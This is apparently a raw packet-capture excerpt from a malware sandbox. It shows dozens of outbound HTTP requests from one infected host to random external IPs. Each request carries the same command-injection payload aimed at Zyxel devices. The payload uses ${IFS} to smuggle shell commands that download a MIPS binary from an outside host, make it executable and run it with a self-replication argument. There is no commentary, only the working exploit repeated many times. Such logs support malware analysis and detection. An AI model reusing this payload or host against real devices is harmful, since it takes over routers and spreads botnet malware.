                                                Jan 12, 2024 18:16:09.124669075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                928192.168.2.233963286.134.233.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124700069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                929192.168.2.2356566142.134.81.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124756098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                930192.168.2.2358878206.230.164.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124794006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                931192.168.2.2338588120.110.138.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124830008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                932192.168.2.2359782148.118.112.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124865055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                933192.168.2.2359464174.35.24.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124933958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                934192.168.2.233997646.156.53.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124979973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                935192.168.2.2337240123.3.69.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125005007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                936192.168.2.234572848.241.174.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125036001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                937192.168.2.2343888115.21.152.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125073910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                938192.168.2.234142454.42.169.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125092983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                939192.168.2.2337564173.145.111.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125144005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                940192.168.2.2354546205.253.145.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125186920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                941192.168.2.23573868.126.194.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125211954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                942192.168.2.233973462.255.60.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125248909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                943192.168.2.2347740156.160.201.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125288963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                944192.168.2.23563385.149.3.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125305891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                945192.168.2.233940489.68.39.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125366926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                946192.168.2.2335174178.237.7.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125427008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                947192.168.2.2339946164.20.71.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125437975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                948192.168.2.233545840.126.24.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125472069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                949192.168.2.235124078.27.231.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125509024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                950192.168.2.2343074187.234.202.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125560999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                951192.168.2.2339702185.123.172.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125581980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                952192.168.2.2354042128.148.81.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125627041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                953192.168.2.23487704.173.109.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125667095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                954192.168.2.2339838163.140.207.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125667095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                955192.168.2.2339080178.246.222.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125739098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                956192.168.2.235928664.172.183.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125742912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                957192.168.2.235989437.131.106.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125775099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                958192.168.2.2355954188.30.40.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125794888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                959192.168.2.2355002206.159.15.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125832081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                960192.168.2.234663276.254.61.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125869989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                961192.168.2.2354362175.178.214.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125910997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                962192.168.2.2343106121.227.134.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125935078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                963192.168.2.233868478.230.90.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125969887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                964192.168.2.2349846109.245.205.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126045942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                965192.168.2.235988082.130.8.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126049042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                966192.168.2.2349064114.42.93.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126056910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                967192.168.2.235270496.28.246.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126095057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                968192.168.2.2339528168.205.87.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126144886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                969192.168.2.23540369.216.84.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126195908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                970192.168.2.2344162137.19.93.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126204014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                971192.168.2.2347390156.62.178.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126240969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                972192.168.2.234539881.117.128.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126269102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                973192.168.2.235698224.137.249.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126301050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                974192.168.2.2351296171.50.229.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126359940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                975192.168.2.2344042106.215.25.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126360893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                976192.168.2.23411629.133.63.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126430035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                977192.168.2.2359762107.92.94.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126480103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                978192.168.2.23591804.156.104.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126496077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                979192.168.2.2352894124.162.53.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126534939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                980192.168.2.2352034139.98.151.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126557112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                981192.168.2.2348804186.14.132.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126558065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                982192.168.2.235773031.90.8.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126617908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                983192.168.2.2348680154.96.248.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126656055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                984192.168.2.2345524170.234.113.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126674891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                985192.168.2.2340438109.15.99.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126715899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                986192.168.2.235633868.161.242.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126748085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                987192.168.2.2347954145.253.26.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126770973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                988192.168.2.2338794190.147.96.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126816988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                989192.168.2.2346198203.168.173.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126842976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                990192.168.2.2360178148.246.79.196443
                                                TimestampBytes transferredDirectionData
